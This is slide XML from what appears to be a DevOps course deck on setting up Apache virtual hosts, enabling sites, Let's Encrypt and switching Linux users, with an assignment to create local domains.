                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6.   vim /var/www/html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>news.vishalmahawar.shop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/index.html</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7.   vim /etc/apache2/sites-available/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>news.vishalmahawar.shop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>.conf</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4275" name="Google Shape;4275;p693"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2593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Working with </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3120">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Real Domain</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accen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91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1350925"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="135000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2900">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>How to switch between users  in linux?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4720">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Google Shape;498;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402900" y="2267400"/>
            <a:ext cx="8520600" cy="1243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5300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>su - &lt;userName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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9" name="Shape 4279"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4280" name="Google Shape;4280;p694"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="958350"/>
            <a:ext cx="8520600" cy="40944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sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;VirtualHost  *:80&gt; </a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ServerName </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>news.vishalmahawar.shop</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DocumentRoot /var/www/html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>news.vishalmahawar.shop</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;Directory /var/www/html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>news.vishalmahawar.shop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AllowOverride All </a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Require all granted </a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/Directory&gt; </a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/VirtualHost&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8. sudo a2ensite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>news.vishalmahawar.shop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>.conf</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apache2ctl configtest</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo systemctl reload apache2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4281" name="Google Shape;4281;p694"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2593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#3 Assignments for DevOps Cont..</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 4285"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4286" name="Google Shape;4286;p695"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="958350"/>
            <a:ext cx="8520600" cy="40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AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Create a Let’s Encrypt SSL Certificate</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4287" name="Google Shape;4287;p695"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2593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#3 Assignments for DevOps Cont..</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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1" name="Shape 4291"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4292" name="Google Shape;4292;p696"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="933750" y="1314650"/>
            <a:ext cx="7664700" cy="32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solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Go to </a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc/apache2/site-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do ls -al</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If you find the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>symbolic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> link of your domain then site is enabled</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4293" name="Google Shape;4293;p696"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="335550"/>
            <a:ext cx="8520600" cy="114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How to check if a site is enabled in apache2 ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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7" name="Shape 4297"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4298" name="Google Shape;4298;p697"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="958350"/>
            <a:ext cx="8520600" cy="409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accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create 20 local domains</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.anildollor.com</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.sunildollor.com</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.vishal.com</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
